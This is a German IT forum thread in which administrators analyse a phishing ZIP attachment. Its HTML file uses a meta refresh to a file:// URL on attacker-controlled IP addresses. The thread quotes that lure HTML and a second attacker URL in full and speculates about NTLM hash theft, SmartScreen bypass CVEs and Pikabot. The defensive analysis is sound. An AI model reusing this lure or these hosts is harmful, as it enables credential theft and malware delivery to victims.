Neuer Typ von Malware?

[zahni 521]

Hi,

 

bei uns ist jetzt mehrfach sowas aufgeschlagen:

 

Mail, die vorgibt aus unserem Haus zu sein (mit sehr alter Signatur, usw,.)

 

Ein ZIP-Anhang mit einer HTML-Datei, und eine Binär-Datei (sieht verschlüsselt aus), Dateiname ein Buchstabe.

 

In der HTML-Datei steht als Beispiel:

 

<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <title>Unsere-Domäne.de</title>
</head>
<body>

  <meta http-equiv="Refresh" content="0; url='file://204.44.125.68/  mcqef/yPXpC.txt'" />

  <div>Voluptas dolores animi nisi qui placeat cumque minima minus. Dolorem aut est dolor dolorem qui. Nihil consequatur eligendi molestiae sunt consequatur ut laboriosam quia. Aut in suscipit suunt tempora.</div>

</body>
</html>

 (Leerzeichen von mir).

 

Idee, wie das funktionieren soll? Oder wird eine Sicherheitslücke im Browser ausgenutzt? Ziel ist natürlich Binärfilter im Proxy und Mail auszutricksen.

[testperson 1.534]

Hi,

 

grobe Spekulation meinerseits: Der User öffnet die HTML Seite im Browser und soll nach 0 Sekunden einen Refresh auf "file://<IP>/  mcqef/yPXpC.txt" machen. Dann ist dort vermutlich ein präparierter Samba/Filer für einen entsprechenden Exploit (etwas aktuelles à la CVE-2020-0796 / WannaCry) und dann geht es weiter. Vielleicht spielt da dann auch CVE-2024-21412 und CVE-2024-21351 noch rein.

 

In einer Sandbox die Textdatei mal laden. :)

 

Gruß

Jan

bearbeitet 27. Februar von testperson

[NorbertFe 1.804]

Ist das vielleicht wieder so ein Trigger um den NTLM Hash abzugreifen aus Outlook heraus? Denn Outlook wird ja evtl. erstmal zum angegebenen Ort switchen wollen und ggf. die Anmeldedaten rübergeben (wobei es das eigentlich aufgrund der Sicherheitszone eigentlich nicht sollte.

vor 20 Minuten schrieb zahni:

Mail, die vorgibt aus unserem Haus zu sein (mit sehr alter Signatur, usw,.)

 

Wie sieht in so einem Fall denn der Sender usw. aus?

Übrigens hatte ich gestern den Fall, dass der Adobe Sign Account wohl von einem externen Partner übernommen wurde und darüber dann diverse Mails mit Aufforderung rausgegangen sind. Schöne neue Welt, wenn niemand mehr seine Credentials bei den richtigen Services eingeben kann, weil er nicht mal mehr weiß, welches die richtigen Services sind und welche nicht. ;)

[zahni 521]

Hier noch eine andere URL (falls die andere down ist):

 

file://103.124.104.22/   zjxb/bO.txt

 

vor 6 Minuten schrieb NorbertFe:

Wie sieht in so einem Fall denn der Sender usw. aus?

Habe leider keine Header. In den weitergeleiteten Mails der MA steht

 

Von: ***** <NQuigley@bluecall.org> Von: **** <HDare@otbforged.com>

[testperson 1.534]

vor 8 Minuten schrieb NorbertFe:

(wobei es das eigentlich aufgrund der Sicherheitszone eigentlich nicht sollte.

Die beiden CVEs (CVE-2024-21412 (Microsoft Windows Internet Shortcut Files Security Feature Bypass Vulnerability) / CVE-2024-21351 (Microsoft Windows SmartScreen Security Feature Bypass Vulnerability)) behandeln AFAIK das für SmartScreen.

[NorbertFe 1.804]

Super ;) wer hat eigentlich neben seiner sonstigen Arbeit Zeit, die ganzen CVE usw. zu lesen und ggf. Gegenmaßnahmen umzusetzen? ;)

vor 8 Minuten schrieb zahni:

Habe leider keine Header. In den weitergeleiteten Mails der MA steht

Aber der User sollte also in der Lage gewesen sein, anhand dieser Info klar zu erkennen, dass die Mail eben nicht von euch ist, oder?

[testperson 1.534]

vor 3 Minuten schrieb NorbertFe:

Super ;) wer hat eigentlich neben seiner sonstigen Arbeit Zeit, die ganzen CVE usw. zu lesen und ggf. Gegenmaßnahmen umzusetzen? ;)

 

In Teilen vielleicht bspw.: Qualys VMDR - Vulnerability Management Tool | Qualys? Zumindest zum Filtern, was für die eigene Umgebung relevant ist?

[zahni 521]

vor 17 Minuten schrieb NorbertFe:

Aber der User sollte also in der Lage gewesen sein, anhand dieser Info klar zu erkennen, dass die Mail eben nicht von euch ist, oder?

Ja, die haben es ja an unsere IT-Sicherheit gemeldet. Wir haben dann noch den Applocker...

 

Ich halte es übrigens für wichtig, dass man die TXT-Datei per IP-Adresse abruft. Gut möglich, dass genau hier eine Zonen-Prüfung fehlschlägt (Sicherheitslücke).

 

PS: Eben wieder so eine Mail. Diesmal hat der Virenscanner auf unserem SMTP-Gateway zugeschlagen.

bearbeitet 27. Februar von zahni

[MrCocktail 188]

In meinen Augen spielt dort momentan die aktuellen Lücken sehr gut rein ...

 

CVE-2024-21410 & CVE-2024-21413 sind da gerade ein schickes Angriffsziel, gerade weil Exchange ExtendedProtection nicht mal eben so eingerichtet ist, wenn es dass dann heute noch nicht.

[NorbertFe 1.804]

vor 37 Minuten schrieb MrCocktail:

gerade weil Exchange ExtendedProtection nicht mal eben so eingerichtet ist, wenn es dass dann heute noch nicht.

Schönes Beispiel für meine Frage oben. Und wenn das selbst bei Exchange so ist, dass da Lücken über Monate offen gelassen werden, weil sich keiner drum schert, dann will ich gar nicht wissen, wie das mit Diensten ist, wo das auch noch viel umständlicher oder gar nicht dokumentiert ist. ;)

[zahni 521]

Es sieht danach aus:

 

https://gbhackers.com/pikabot-edr-evasion/

 

Wobei immer noch nicht klar ist, wozu die Binäre-Datei gut ist und warum ein Browser die TXT-Datei ausführen sollte,